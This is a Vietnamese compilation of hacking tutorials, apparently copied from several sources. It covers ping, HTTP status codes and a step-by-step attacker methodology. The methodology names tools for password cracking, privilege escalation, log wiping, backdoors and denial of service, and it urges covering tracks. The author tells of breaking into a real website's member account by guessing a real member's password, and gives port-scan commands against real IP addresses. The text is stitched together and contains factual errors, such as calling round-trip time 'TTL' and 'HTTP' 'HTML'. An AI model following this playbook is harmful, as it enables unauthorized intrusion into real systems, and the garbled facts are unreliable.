Using proxying với những dịch vụ internet:vì proxy server chèn vào giữa sự kết nối client và server, nó phải được thích ứng với từng dịch vụ riêng, đội khi một số dịch vụ rất dễ với cách phục vụ bình thường nhưng lại rất khó khi thêm vào proxy

Source: collection, unknown

Tìm hiểu về "Ping"

Ping là gì?

Ping là một chương trình cho phép bạn xác định một host còn hoạt động(alive) hay không?

Một ví dụ về Ping!

C:\> ping www.aqnet.com

Pinging www.aqnet.com [209.54.218.119] with 32 bytes of data:

Reply from 209.54.218.119: bytes=32 time<10ms TTL=128

Reply from 209.54.218.119: bytes=32 time<10ms TTL=128

Reply from 209.54.218.119: bytes=32 time<10ms TTL=128

Reply from 209.54.218.119: bytes=32 time<10ms TTL=128

Ping statistics for 209.54.218.119:

Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),

Approximate round trip times in milli-seconds:

Minimum = 0ms, Maximum = 0ms, Average = 0ms

C:\>

www.aqnet.com(209.54.218.119) -> alive!

Nếu bạn nhận được thông báo "Host Alive", điều này có nghĩa là host không còn hoạt động!

Ping hoạt động ra sao?

Ping gởi một ICMP message "echo request" đến host. Nếu nhận được một ICMP message "echo reply" của host, ping sẽ thông báo host còn hoạt động. Nếu không nhận được ICMP message "echo reply" của host, ping sẽ thông báo host này đã ngừng hoạt động!

Format của ICMP "echo request" và "echo reply" có dạng như sau:

0 7 8 15 16 31

+-----------------+-----------------+-----------------+

| Type (0 or 8) | Code (0) | 16-bit Checksum |

+-----------------+-----------------+-----------------+

| Indentifier | sequence number |

+-----------------+-----------------+-----------------+

| (Optional Data) |

+-----------------------------------------------------+

Bất cứ lúc nào host nhận được một ICMP request message, nó sẽ phản hồi trở lại với một identifier và số sequence number. Trong hầu hết các hệ thống Unix, trường indentifier được đặt số Process ID của tiến trình gởi gói packet đi. Vì vậy, nếu bạn ping cùng một lúc nhiều lần đến một hệ thống Unix, giá trị indentifier mà bạn nhận được trong mỗi lần ping sẽ khác nhau!

Trường sequence number có giá trị mặc định là 0. Giá trị này sẽ được tăng một sau mỗi lần hệ thống phản hồi ICMP request message của chương trình ping. Ping sẽ in ra giá trị sequence number của mỗi lần nhận packet, điều này cho chúng ta biết được các gói packet có gặp lỗi hay không?!

(Để biết chi tiết về các trường khác, bạn hãy tham khảo các bài viết về giao thức TCP-IP!)

Bây giờ chúng ta hãy xem qua ví dụ cuối cùng:

# ping hackingtruths.box.sk

Pinging hackingtruths.box.sk [194.x.yyy.227] with 32 bytes of data:

32 bytes from 194.x.yyy.227: icmp_seq=0 ttl=225 time=0 ms

32 bytes from 194.x.yyy.227: icmp_seq=1 ttl=225 time=0 ms

32 bytes from 194.x.yyy.227: icmp_seq=2 ttl=225 time=0 ms

32 bytes from 194.x.yyy.227: icmp_seq=3 ttl=225 time=0 ms

32 bytes from 194.x.yyy.227: icmp_seq=4 ttl=225 time=0 ms

32 bytes from 194.x.yyy.227: icmp_seq=5 ttl=225 time=0 ms

32 bytes from 194.x.yyy.227: icmp_seq=6 ttl=225 time=0 ms

...

Ở dòng đầu tiên, ping phân tích hostname ra địa chỉ ip. Bạn có nhận thấy giá trị icmp_seq tăng dần từ 0 sau mỗi lần ping nhận được ICMP message "echo reply" từ host không? Như vậy là các gói packet mà chúng ta nhận điều không gặp lỗi gì hết! Ping còn cho chúng ta biết thời gian TTL(Time To Live) nữa! Ping lưu thời gian mỗi lần gởi ICMP message "echo request". Khi nhận được ICMP message "echo reply" từ host, Ping sẽ lấy thời gian hiện tại trừ đi giá trị này sẽ ra TTL!

Okay, bây giờ thì bạn biết Ping làm việc như thế nào rồi đó!

Mã trạng thái HTML:

Tìm hiểu

Khi một client gởi yêu cầu lấy tài nguyên - resource(thường là files) đến web server thì việc đầu tiên mà web server này làm là gởi trả lại client một mã trạng thái HTML.

Việc thứ hai là server sẽ gởi tài nguyên đến client. Ví dụ khi bạn kết nối đến

http://k.domaindlx.com/clairsang/www.yahoo.com/default.htm

thì yahoo sẽ gởi mã trạng thái "200"(OK) và gởi nội dung file index.html cho trình duyệt web của bạn. Tuy nhiên, trình duyệt web không hiển thị mã trạng thái, nó chỉ hiển thị file index.html thôi!

Cũng có khi bạn đến một trang nào đó và nhận được mã trạng thái HTML "404"(Page Not Found) từ trình duyệt, điều này có nghĩa là web server không xác định được tài nguyên(trang web) mà bạn yêu cầu! Cũng vậy, khi bạn nhận được mã "301"(Moved Permanently - đã được di chuyển) hoặc "302"(Moved Temporarily - tạm thời bị chuyển đi) có nghĩa là tài nguyên đó đã được chuyển đến một nơi khác!

(Để biết thêm thông tin về mã trạng thái HTML, bạn hãy tham khảo

RFC2616

,

RFC2068

RFC2817

(RFC là chữ viết tắc của từ Request For Comment - Các Đề Nghị Xác Định Chuẩn Giao Thức. Bạn hãy đến trang

http://k.domaindlx.com/clairsang/support.vnn.vn/tailieu/index.shtml

để tìm kiếm RFCs!)

Mọi mã trạng thái HTML đều gồm 3 số nguyên.

Số đầu tiên cho biết class(lớp) của respone. Hai số sau thì tuỳ thuộc vào việc phân loại mã trạng thái!

1xx: Informational - yêu cầu(request) đã được nhận, tiếp tục tiến trình xử lí

2xx: Success - thành công

3xx: Redirection

4xx: Client Error - yêu cầu sai cú pháp hoặc không thỏa đáng

5xx: Server Error - máy chủ gặp lỗi

Sau đây là một số mã trạng thái HTML/1.1:

100 : Continue

101 : Switching Protocols

200 : OK

201 : Created

202 : Accepted

203 : Non-Authoritative Information

204 : No Content

205 : Reset Content

206 : Partial Content

300 : Multiple Choices

301 : Moved Permanently

302 : Moved Temporarily

303 : See Other

304 : Not Modified

305 : Use Proxy

307 : Temporary Redirect

400 : Bad Request

401 : Unauthorized

402 : Payment Required

403 : Forbidden

404 : Not Found

405 : Method Not Allowed

406 : Not Acceptable

407 : Proxy Authentication Required

408 : Request Time-out

409 : Conflict

410 : Gone

411 : Length Required

412 : Precondition Failed

413 : Request Entity Too Large

414 : Request-URI Too Large

415 : Unsupported Media Type

416 : Requested range not satisfiable

417 : Expectation Failed

500 : Internal Server Error

501 : Not Implemented

502 : Bad Gateway

503 : Service Unavailable

504 : Gateway Time-out

505 : Version HTML không được hổ trợ

Các ứng dụng HTML không cần hiểu hết các mã trạng thái HTML đã được đăng kí. Tuy nhiên có một điều là nó PHẢI hiểu được class của mã trạng thái(số nguyên đầu tiên trong mã trạng thái). Dựa vào class, nó có thể biết được respone có được công nhận hay không. Ví dụ, khi client nhận được mã trạng thái 431(mã này nó thật sự không biết). Nó sẽ dựa vào class của mã trạng thái này là 4 và sau đó sẽ phát thông báo lỗi 400 - Bad Request cho bạn. Đây thật sự là một biện pháp hữu hiệu!

Hy vọng đến đây bạn có thể hiểu được mã trạng thái HTML là gì nhỉ ?!

Các bước của Hacker :

<Bước 1>

FootPrinting :

Các mục tiêu của bước này chủ yếu là những thông tin ban đầu về server . Công nghệ bạn cần sử dụng là : Open source search ( nguồn máy chủ tìm kiếm ) Whois , Web interface to whois , Arin Whois , DNS zone transfer ( bộ phận này chủ yếu là kiểm tra về người chủ server , DNS .. cấu trúc server chưa thể hiện rõ ở đây ) 1 số công cụ : UseNet , search engines ( công cụ tìm kiếm ) , Edgar Any Unix client , http://k.domaindlx.com/clairsang/www.networksolutions.com/whois , http://k.domaindlx.com/clairsang/www.arin.net/whois , dig , nslookup Is -d , Sam spade

Xem thêm tại đây

<Bước 2>

Scanning :

Phần lớn các server chịu bung thông tin quan trọng trong bước này , hãy cố gắng tận dụng bước này triệt để để biết các port trên server , nghe đường dữ liệu . Công nghệ bạn cần sử dụng là : Ping Sweep , TCP/UDP port Scan , Os Detection . Các công cụ : fping , icmpenum Ws_ping ProPack , nmap , SuperScan , fscan nmap , queso , siphon .

<Bước 3>

Enumeration :

Đến bước này , các attacker bắt đầu kiểm soát server sơ bộ , xác định các account trên server , mức độ bảo vệ ... Công nghệ bạn cần sử dụng là : List user accounts , List file share , Identify applications . Các tool phụ trợ : null sessions , DumpACL , sid2user , OnSite Admin showmount , NAT , Legion banner grabbing với telnet , netcat , rpcinfo .

<Bước 4>

Gaining access :

Aha , đã có đủ dữ liệu để kết hợp tất cả chúng lại . Chúng ta bắt đầu đến gần mục tiêu . Hãy nắm chắc cơ hội . 1 account có thể bị Crack . Công nghệ : Password eavesdropping , File Share brute forcing , Password file grab , buffer overflows . Các tool : tcpdump , L0phtcrack readsmb , NAT , legion , tftp , pwdump2 ( NT ) ttdb , bind , IIS , .HTR/ISM.DLL

<

Bước 5>

Escalating privilege :

Nếu 1 account không may mắn nào ở một cấp độ nào đó bị crack ở bước trên , chúng ta sẽ có cái tận dụng để điều khiển Server . Công nghệ : Password cracking , BUG ,Exploits . Tools : john , L0phtcrack , Ic_messages , getadmin , sechole .

<Bước 6>

Pilfering :

Thông tin lấy từ bước trên đủ để ta định vị server và điều khiển server . Nếu bước này không thành công , hãy đến bước <9> . Công nghệ : Evaluate trusts , Search for cleartext passwords . Tool : rhost , LSA Secrets user data , configuration files , Registry .

<Bước 7>

Covering Tracks :

Hệ thộng luôn ghi nhận những hành động của bạn . Nếu bây giờ mà kết thúc , chắc bạn bị tóm ngay . Đây là bước cực kì quan trọng . XÓA LOG . Công nghệ : Clear logs , hide tools . Tools : Zap , Event log GUI , rootkits , file streaming .

<Bước 8>

Creating Backdoors :

Còn phải hỏi , bạn phải để lại 1 cái cổng sau , lần sau có vào thì dễ hơn chứ . Nếu không thành công , quay lại bước <4> xem lại các quyền của user bạn sử dụng . Công nghệ : Creat rogue user accounts , schedule batch jobs , infect startup files , plant remote control services , install monitoring mechanisms , replace apps with Trojan . Tools : members of wheel , administrators cron, At rc , Startup folder , registry keys , netcat , remote.exe , VNC , BO2K , keystroke loggers, add acct to secadmin mail aliases login , fpnwclnt.dll

<Bước 9>

Denial of Servies :

1 attacker không thành công với những gì anh ta đã làm ... họ sẽ tận dụng những exploits code để làm cho server ngừng hoạt động luôn , gọi đó là : tấn công từ chối dịch vụ . Công nghệ : SYN flood , ICMP techniques , Identical src/dst SYN requests , Overlapping fragment/offset bugs , Out of bounds TCP options ( OOB ) DDoS . Tools phụ trợ : synk4 , ping of death , smurf land , latierra , teardrop , bonk , newtear , supernuke.exe , trinoo/TFN/stacheldraht

Thế đó , những bước hacker hay attacker làm với server khi họ muốn attack . Không đơn giản chút nào nhỉ ?

Những tool trên , bạn có thể search ở các máy tìm kiếm như http://k.domaindlx.com/clairsang/www.google.com/default.htm , http://k.domaindlx.com/clairsang/www.av.com/default.htm ... với từ khoá là tên tôi đã cho .

1 vài tool bạn có thể tìm nhanh tại đây.

Hacking , AntiHacking :

Bài học này được chia làm 2 phần chính, với mục đích là giới thiệu cho các bạn hiểu một số cách thức mà hacker sử dụng để thâm nhập vào hệ thống và một số phương pháp có thể áp dụng để tự bảo vệ bạn. Bài học này cũng ko có ý định hướng bạn đến một cái nhìn xấu về hành vi của hacker mà mục đích là giúp bạn hiểu rõ hơn về vấn đề an toàn bảo mật.

Cụ thể như sau:

1- Các hacker đã làm như thế nào, động cơ thúc đẩy họ và các phương pháp thông dụng

2- Một số biện pháp tự bảo vệ, bắt đầu từ việc thiết kế, xây dựng ngôi nhà của bạn đến việc đánh giá, tìm hiểu rõ hơn về các quá trình nhận dạng xâm nhập, tự bảo vệ...

Chúng ta sẽ đi từng bước một. Ở đây tôi sẽ cố gắng tóm lược mà ko đi quá sâu vào chi tiết nhằm tạo bài học sáng sủa dễ hiểu.

I. PHÍA HACKERS

1- Mục đích và động cơ của hackers:

- Đạt mục đích gì đó liên quan đến tiền bạc, như thay đổi thông tin về tài khoản trong ngân hàng, chuyển tiền, trộm credit card...

- Giải trí khi rảnh rỗi, thử tay nghề, chứng tỏ khả năng , kiểm tra mức độ bảo mật...

- Làm yếu đi hoặc giảm khả năng chống cự của các hệ thống trên mạng, giúp dễ dàng cho việc xâm nhập khai thác theo mục đích nào khác...

- Tận dụng các tài nguyên trên mạng như đĩa cứng, tốc độ CPU, dung lượng đường truyền mạng...Hacker có thể lợi dụng sơ hở của 1 server để chiếm một vùng ko gian đĩa free trên nó để chứa dữ liệu của mình, hoặc lợi dụng tốc độ CPU và bandwidth của các server (thường rất nhanh) để làm vào việc khác như tính toán..., thậm chí dùng để DoS các server khác...

- ...

Từ những mục đích trên, bạn cần hiểu rõ bản thân hệ thống bạn đang kiểm soát. Có những vấn đề đặt ra như sau:

- Bạn đang nắm giữ và bảo vệ cái gì, mức độ quan trọng của chúng?

- Cách thức nào người ta có thể tìm cách tấn công, trộm thông tin hay thậm chí phá hủy thông tin của bạn?

- Mức độ khó mà hacker sẽ gặp phải, họ thành công đến mức độ nào?

- Mức độ ảnh hưởng nghiêm trọng thế nào nếu hacker thành công?

Việc hiểu rõ và đánh giá đúng chính mình cũng như khả năng của đối phương có thể giúp bạn hạn chế tối đa khả năng bị tấn công. Có một điều bạn phải hiểu nó như một yếu tố khách quan, tất yếu là "Mọi hệ thống phức tạp sớm muộn cũng sẽ gặp rắc rối", vì đơn giản là các hệ thống đó cho bàn tay và trí tuệ con người tạo ra, mà con người thì ko ai hoàn hảo cả. Nếu bạn chú ý sẽ biết trong thời gian vừa qua, các hệ thống được xem vào hàng đại gia trên net đều đã từng được viếng thăm, như Microsoft, Oracle, eBay, NASA, CIA, các cơ quan liên bang USA, các hệ thống ngân hàng lớn trên thế giới...Security liên tục được cải thiện, và bên cạnh đó thì lỗi, lổ hổng cũng ko ngừng đựơc phát hiện.

2- Một số cách thức hacker dùng để xâm nhập

Về cơ bản, để có thể tiến hành thâm nhập vào hệ thống, các hacker thường phải qua những bước sau. Lưu ý các bước tôi trình bày ở đây không bắt buộc phải được thực hiện tuần tự mà tùy vào điều kiện và ngữ cảnh để áp dụng cho thích hợp. Các công cụ trình bày ở đây các bạn cần tìm hiểu cách sử dụng, tôi sẽ không trình bày chi tiết.

a. Xác định mục tiêu - Footprinting

Bước này tương đối đơn giản. Tuy nhiên đối với hacker thật sự muốn tìm cách thâm nhập vào 1 hệ thống thì bước này rất cần thiết. Càng thu thập được nhiều thông tin liên quan đến mục tiêu càng tốt. Ví dụ như muốn thâm nhập trang web của 1 công ty nào đó, điều đầu tiên các hacker thường dùng là xác định host, domain (nếu là website); dùng các công cụ như WhoIS, Ping, ICMP (nMap, Fping)..để tìm hiểu các thông tin liên quan đến host/domain như vị trí, các Domain Name Records..Ví dụ từ domain name, ta có thể ping để biết được nó host ở đâu với IP cụ thể là gì...; hoặc tìm hiểu cấu trúc mạng của đối phương sử dụng các phương pháp routing (traceroute) và SNMP data.

Kế đến là dạo quanh web site, tìm hiểu cấu trúc website, tìm cách download source code (bằng các trình như Teleport Pro, Intellitamper....download tại đây), vì từ đó có thể biết được các thông tin mà người chủ cố tình hoặc vô tình để hở như tên liên lạc, emails, số điện thoại, các thông tin liên quan đến bảo mật (như cơ chế an toàn, ngôn ngữ lập trình..); các liên kết liên quan đến website...

Việc dạo và xem cấu trúc website đôi khi sẽ cho ta cái nhìn tổng quan về bảo mật của site đó, nếu may mắn ta có thể tìm được lỗi (thường là lỗi lập trình, lỗi thiết lập access right/chmod chưa đúng..) trên các webpage, liên kết.

Các search engine như Google, AltaVista...cũng có thể trở thành công cụ rất hữu ích trong quá trình này. Ví dụ search trên Google để tìm các trang dùng asp, có trang quản lý của admin và giới hạn ở các site ViệtNam, ta có thể search theo từ khóa: "/admin/ asp site:.com.vn" hoặc "admin.asp login.asp site:.com.vn" ..Ví dụ search trên AltaVista để tìm các link liên quan đến site www.hcm.fpt.vn, ta có thể dùng từ khóa "link:www.hcm.fpt.vn AND anydata"

Đây là một ví dụ điển hình về kết quả đạt đựơc khi tìm hiểu về website: <http://www.yes.com.vn>

Lần dạo đầu tiên qua site này điều đầu tiên nhận thấy là họ dùng ASP để thiết kế. Tuy nhiên tôi chưa vội quan tâm đến việc tìm lỗi liên quan đến nó mà chú ý đến mục Hội viên và Đăng nhập hội viên, đây là vùng riêng của các member tham gia webiste. Cụ thể là tại <http://203.162.1.201/hoivien/index.asp?Lang=4> , điều tôi hay làm là thử download cấu trúc website dùng Intellitamper. Kết quả sau khi download của IT là rất nhiều file asp, ở đây tôi quan tâm đến thư mục /hoivien/ vì trang đăng nhập nằm ở thư mục này. Trong thư mục này kết quả cho thấy có 6 file asp, trong đó có file hvshow.asp làm tôi quan tâm. Tôi chạy thử nó trên browser <http://203.162.1.201/hoivien/hvshow.asp> , kết quả cho thấy bên cạnh thông báo đăng kí là thông tin của hội viên thứ 1 với login name là yesco, tên là DuongMinh và 1 số thông tin khác. Nghĩ đến việc đoán password, tôi quay trở lại trang login lúc nãy và thử đăng nhập vào với login name là yesco, pass là duongminh.

Không thành công! pass là duong cũng fail! pass là minh! Thành công! Bạn là Hội viên Vàng...Sau đó tôi xem qua 1 chút và cẩn thận logout. Ví dụ này tôi đưa ra với mục đích giúp các bạn hiểu 1 trong các bước cơ bản đầu tiên trong quá trình hacking. Hy vọng các bạn khi thử thành công không nên làm ảnh hưởng đến dữ liệu của người khác.

Xem thêm tại đây

b. Thu thập thông tin về mục tiêu - Scanning, Enumeration

Bước này thật ra tương tự bước đầu tiên (Footprinting) nhưng ở mức độ chi tiết và nâng cao hơn.

- Tìm hiểu các dịch vụ (services) được dùng trên hệ thống đối phương, dò/quét các cổng (port) để tìm kiếm cổng hở, xác định dịch vụ dùng cho cổng này.

Một số công cụ thừơng được dùng như:

Nmap (www.insecure.org/nmap)

Netcat (download

tại đây

Strobe (packetstorm.security.com)

ISS (www.iss.net)

Các trình duyệt cổng hở và các tài nguyên chia xẻ (share) khác dùng cho Windows như Superscan

download

tại đây

, Sechole, Redbutton, Net Essential...

Quá trình duyệt cổng có thể cho ta biết được các dịch vụ web nào được sử dụng ở mục tiêu. Ví dụ như các cổng TCP: 139, 135 (NETBIOS), 110 (pop3), 80 (HTTP), 79 (Finger), 53 (domain), 25 (smtp), 21 (ftp)...Thậm chí cả hệ điều hành và webserver đựơc sử dụng ở mục tiêu.

Ví dụ với netcat, ta dùng lệnh sau: nc -v -z 203.162.1.1 1-255

Với nmap, ta dùng: nmap -sS 203.162.1.1/255 hay nmap -p80 -O 203.162.1.10

Các bạn tự tìm hiểu cách sử dụng các tool khác. Lưu ý các câu lệnh ví dụ ở đây chỉ mang tính chất tham khảo.

- Tìm hiểu các lỗi/lổ hổng bảo mật mà mục tiêu có thể mắc phải. Ta có thể tìm thông tin từ các website sau:

www.securityfocus.com

www.l0pht.com

www.microsoft.com/security

packetstorm.security.com

...

Hoặc có thể đăng kí ở các mailing list để có thể nhận được các thông tin về security cập nhập nhất:

Buqtraq (www.securityfocus.com)

NTBugTraq (www.ntbugtraq.com)

Pen-Test (www.securityfocus.com)

...

c. Tiến hành tấn công

- Khai thác điểm yếu của hệ thống, hệ điều hành

. Thử tìm cách truy xuất đến các dịch vụ của hệ thống dựa trên hoặc có liên quan đến các lỗi bảo mật

. Tìm hiểu các thông tin về lỗi bảo mật từ các nhà sản xuất hệ thống, tìm hiểu các thông tin patch/update tương ứng với version bạn đang nghiên cứu

- Khai thác điểm yếu của các ứng dụng dùng trên máy chủ - server

. Một số ứng dụng server có thể có lỗi như Microsoft IIS, Netscape Enterprise Server, Oracle, Apache...

- Khai thác điểm yếu của các ứng dụng client

. Tìm hiểu các lỗi về /cgi-bin,

các lỗi về tràn bộ đệm

. Tìm hiểu các lỗi về javascript

. Tìm hiểu các lỗi về cookies

. Tìm hiểu các thiết lập mặc định của các ứng dụng web, vd như mật khẩu admin ngầm định của một số forum...

- Leo thang đặc quyền (Escalate Privileges), tôi chỉ mô tả một số cách có thể đạt được mục đích

. Theo dõi trên mạng (sniff) để tìm cách lấy các thông tin bảo mật của người dùng, vd như dùng các công cụ bắt gói tin (packet sniffer) để bắt các thông tin liên quan đến mật khẩu di chuyển trên mạng...

. Tìm cách lấy các SUID từ các chương trình quản lý nhưng khả năng kiểm tra các giá trị nhập vào hoặc các giá trị biên kém.

. Tìm hiểu các user (user ID) ko có mật khẩu, mật khẩu rỗng, hoặc các mật khẩu ngầm định

. Tìm kiếm các thông tin về mật khẩu trong các file trên hệ thống, dùng các công cụ crack pass nếu các file password đựơc mã hoá

. Tìm hiểu kĩ mối quan hệ giữa các máy trong hệ thống muốn thâm nhập, dò các sơ hở và tìm cách khai thác lan rộng ra khắp hệ thống.

Như vậy, leo thang đặc quyền là tìm cách nâng cao quyền hạn của mình trong hệ thống. Vi dụ từ user Guest hay Normal user trong hệ thống, hacker có thể tìm hiểu các sơ hở để từ đó bổ sung thêm quyền hạn cho mình, thậm chí đoạt quyền admin. Một ví dụ điển hình của leo thang đặc quyền trong quá trình khai thác lỗi của Hosting Controller, khi upload 1 exploit script lên 1 normal host, nếu sau đó ta tìm cách chuyển script đó vào thư mục admin của HC thì khi run nó sẽ có quyền admin.

- Mở rộng khai thác ra các hệ thống lân cận; xác định các mục tiêu kế tiếp bắt nguồn hoặc có liên quan đến mục tiêu ban đầu

. Dùng netstat -na để tìm hiểu các connection đến các máy khác

. Thử khả năng từ một máy trong mạng, kết nối đến máy khác có trust-relationship, nếu may mắn thì có thể thâm nhập được mà ko phải qua các quá trình kiểm tra gắt gao

. Tìm hiểu các file có trên hệ thống, chẳng hạn như các file trong *nix /etc/hosts, ssh/identity.pub ...

- Các bước khác tùy khả năng của bạn.

d. Xóa dấu vết (xóa log files..),

tệ hơn có thể là phá hủy thông tin của hệ thống

3- Các mục tiêu và phương pháp hay dùng hiện nay

a. Các mục tiêu thuờng bị tấn công

- Unix và các biến thể từ nó: Linux, FreeBSD, Solaris, SCO..

- Các hệ thống Windows NT, 2k, XP, 9x...

- Các dịch vụ và máy chủ WWW

- Các ứng dụng web, forum...

- Trộm mật khẩu của các dịch vụ web như các web e-mail, instant messenger...

b. Các kiểu tấn công thông dụng

- Tấn công làm ngập đường truyền mạng (flood), tấn công từ chối dịch vụ (Distributed Denial of Service)

- Tấn công dạng local - cục bộ

- Tấn công remote - từ xa

- Tấn công dạng điều khiển dữ liệu - data driven

Bây giờ tôi sẽ phân tích chi tiết hơn về các kiểu tấn công ở trên.

b.1 Tấn công từ chối dịch vụ (DoS)

- Feature driven

SYN flooding

- Inappropriate configurations

SMURF

- Programming flaws

Teardrop

- Distributed DoS: DoS tập thể 1 mục tiêu từ nhiều hướng, nhiều máy

....(Sẽ biên soạn và bổ sung sau)

Xem thêm tại đây.

b.2 Tấn công dạng local - host based

- Khai thác các lỗi tràn bộ đệm

Cách hạn chế: Quản lý tốt bộ nhớ, stack; cập nhật các bản sửa lỗi; lập trình kĩ càng và tốt hơn.

- Khai thác các điểm yếu trong việc kiểm tra điều kiện thực thi của các ứng dụng

Cách hạn chế: Lập trình kĩ và tốt hơn

- Dùng trojan, backdoor, virus...

Cách hạn chế: Kiểm tra kĩ càng các chương trình lạ trứơc khi thực hiện, sử dụng các trình diệt virus thông dụng và thường xuyên cập nhật

- Crack password

Cách hạn chế: Dùng các kĩ thuật mã hóa cao hơn, hạn chế số lần thử mật khẩu ở các login form

- Đăng nhập vào hệ thống kiểu vật lý bằng cách khởi động từ đĩa mềm hoặc một hệ điều hành song song khác

Cách hạn chế: Tăng cường các biện pháp bảo vệ các thiết bị

Xem thêm tại đây

b.3 Tấn công dạng remote

- network based

- Khai thác các lỗi tràn bộ đệm

Cách hạn chế: Tương tự như ở local

- Tấn công nhiễm độc tên miền (DNS Cache poisoning)

Cách hạn chế: Dùng cache timeout, DNSSEC, Non-Caching Servers

- Tấn công vào lỗi/lổ hổng của website.

Cách hạn chế: Cập nhật các bản sửa lỗi mới nhất, thiết lập cấu hình chính xác, điều chỉnh các quyền hạn, thiết kế và viết mã website tốt.

- Khai thác các tên đăng nhập, mật khẩu yếu; tức là các mật khẩu ngầm định, quá ngắn, dễ đoán; hoặc các dạng đăng nhập có cơ chế kiểm tra sơ hở, ko kiểm tra số lần thử password...làm dễ crack bằng dictionary, bruteforce...

Cách hạn chế: Tăng cường kiểm tra số lần thử password (vd sẽ ko cho tiếp tục đăng nhập nếu số lần nhập sai password quá 5 lần..), giới hạn chiều dài password tối thiểu, tăng cường mã hóa bằng các giải thuật tốt...

- Khai thác từ các thông tin chia sẻ (sharing) như SMB/NetBIOS, NFS

Cách hạn chế: giới giạn quyền hoặc tắt share, nâng cấp hệ thống file có khả năng bảo mật cao hơn như NTFS, HPFS...

b.4 Tấn công dạng điều khiển dữ liệu - data driven

- Khai thác sơ hở của các đối tượng dữ liệu dùng phía server, các mã Java, Javascript, VBScript, Perl, PHP..., các ActiveX control.

- Dùng cửa sau (backdoor), trojan, virus

Vài thông tin về các backdoor:

Unix:

sshd

Windows: BackOffice 2k, DeepThroat (cổng UDP 2140, 3150), NetSphere (TCP 30100, 30102), GateCrasher (TCP 6969), GirlFriend (TCP 21554), Hack'a'Tack (TCP 31785; UDP 31789, 31791), EvilFTP (TCP 23456), SubSeven (TCP 1234)

- Khai thác sơ hở từ các cổng dịch vụ, các giao thức cấu hình sai hoặc có cơ chế bảo mật yếu.

Cách hạn chế chung dạng này: Cập nhật các bản sửa lỗi, fix lỗi; thiết lập cấu hình chính xác; dùng tường lửa (firewall, proxy), các trình antivirus.

II. PHÍA NHỮNG NHÀ QUẢN TRỊ HỆ THỐNG

Chúng ta sẽ đề cập đến một số phương pháp có thể giúp ích cho những nhà quản trị trong việc hạn chế và ngăn chặn sự tấn công của hacker

1- Thiết kế tốt hệ thống - Design

Một trong những nguyên nhân chủ yếu giúp hacker thành công trong việc hack vào các hệ thống là do bản thân sự yếu kém trong việc thiết kế hệ thống của những nhà quản trị. Một hệ thống được gọi là tốt phải là một sự phối hợp đồng nhất và hiệu quả của các thiết bị phần cứng (đường truyền mạng, router, server...) và phần mềm (OS, software...). Phần cứng phải được lựa chọn phù hợp; bố trí, cài đặt hợp lý và được bảo vệ cẩn thận. Phần mềm cài đặt và thiết cấu hình chính xác, cập nhật thường xuyên các bản sửa lỗi. Một điều quan trọng là chúng phải đựơc quản lý bởi người có kiến thức và kinh nghiệm.

Một số vấn đề ta cần quan tâm ở đây:

- Tường lửa

- Phân chia, bố trị mạng

- Kiểm tra thường xuyên các nỗ lực thâm nhập

...

2- Kiểm tra kĩ lưỡng hệ thống - Quality Assurance

...

3- Theo dõi các hành vi tấn công - Intrusion Detection

...

4- Các chính sách bảo mật và kết luận chung - Security Policies

...

III. NHỮNG CÔNG CỤ HỮU ÍCH

...

How Hackers/Crackers Break Into Your System ?

Trong vài năm trở lại đây thì vấn đề an toàn trên mạng thu hút được rất nhiều sự quan tâm. Sự hỗn độn và thay đổi chóng mặt của internet là yếu tố chính là cho người dùng và các doanh nghiệp phải tự mình tăng cường khả năng bảo mật cho máy tính và hệ thống mạng của họ.

Cách đây 10 năm, những người đã cài đặt các hệ thống máy chủ có rất ít hiểu biết và kỹ năng về bảo mật. Và ngay cả hiện nay, trong số những người vẫn thường cài đặt hệ thống máy chủ vẫn còn rất nhiều thiếu kinh nghiệm về bảo mật.

Những người dung bình thường được trấn an bởi những thông báo từ các công ty lớn về các phương pháp bảo mật của họ. Nhưng không thể chối cãi được sự thật rằng hang tháng chúng ta lại có thêm những thông tin rằng hacker lại đột nhập vào đâu đó và lấy cắp thông tin.

Nhưng tại sao chúng ta lại phải quan tâm đến vấn đề đó. Tôi có thể nói về sự nghiêm trọng của việc deface (??) các trang web, ăn trộm các thông tin bí mật của công ty hay đột nhập vào các hệ thống của chính phủ, nhưng đơn giản hơn hãy để ý đến các lý do cá nhân mà chúng ta vần phải quan tâm.

Bây giờ xin đạt một câu hỏi. Bạn nghĩ thế nào về giá thị của các thông tin mà bạn có? Danh sách đối tác, email, số credit card hay các kế hoạch kinh doanh, báo cáo tài chính có ý nghĩa đối với bạn như thế nào?

Nếu tôi nói rằng tôi có thể đột nhập vào bất kỳ hệ thống nào, thì tôi có thể làm được những gì nhỉ? Tôi sẽ lấy số credit card để tiêu xài, thay đổi tài khoản ngân hàng của bạn. Tôi có thể làm cho bạn trở thành mất tích ở trên mạng. Tôi cũng có thể bán các thong tin bí mật cho đối thủ cạnh tranh của bạn, hay làm cho hệ thống của bạn ngừng hoạt động, như vậy bạn sẽ bị lỗ nặng .

Hoặc giả sử tôi là một nhân viên trong công ty của bạn, nhưng tôi bất mãn. Tôi có thể tấn công làm cho mạng không hoạt động, hay cài virus để cho bạn bị mất toàn bộ dữ liệu.

Bạn có chắc là chúng ta cần đến các biện pháp bảo mật không?

Vấn đề bảo mật có thể chia làm các nhóm sau:

1. Mạng và máy chủ bị cấu hình sai.

2. Hệ điều hành và ứng dụng bị lỗi.

3. Nhà cung cấp thiếu trách nhiệm

4. Thiếu những cá nhân đáng tin tưởng.

Cấu hình sai máy chủ:

Đây là nguyên nhân tạo ra đa phần các lỗ hổng bảo mật. Rất nhiều khi người quản trị không nhận biết được các dịch vụ đang chạy trên máy chủ của họ. Bạn có thể hỏi tại sao lại như vậy được? Hãy nghĩ đơn giản như chương trình Word, có bao nhiêu khả năng mà bạn biết được. Nếu biết một vài thứ cơ bản như viết macro thì bạn đã có thể trở thành người dung cao cấp rồi. Đa phần người dùng chỉ biết đến các tính năng cơ bản như lưu, xoá, đánh vần, kẻ bảng .v.v.

Tương tự như vậy đối với hệ điều hành và ứng dụng. Sự thay đổi nhanh chóng của công nghệ làm cho chỉ một số ít người có thể theo kịp. Và như thê thì các máy tính nối mạng hiển nhiên là đang đối mặt với nguy cơ bị xâm nhập.

Sau đây là một vài ví dụ về các ứng dụng và dich vụ:

Hệ thống in trên mạng.

Hệ thống điều khiển từ xa.

Chia xẻ file.

Các mã CGI và script ví dụ.

Khi những hệ thống này sử dụng các giá trị mặc định hoặc bị cấu hình sai thì sẽ là cơ hội tốt để kẻ xấu xâm nhập.

Lỗi trong các ứng dụng:

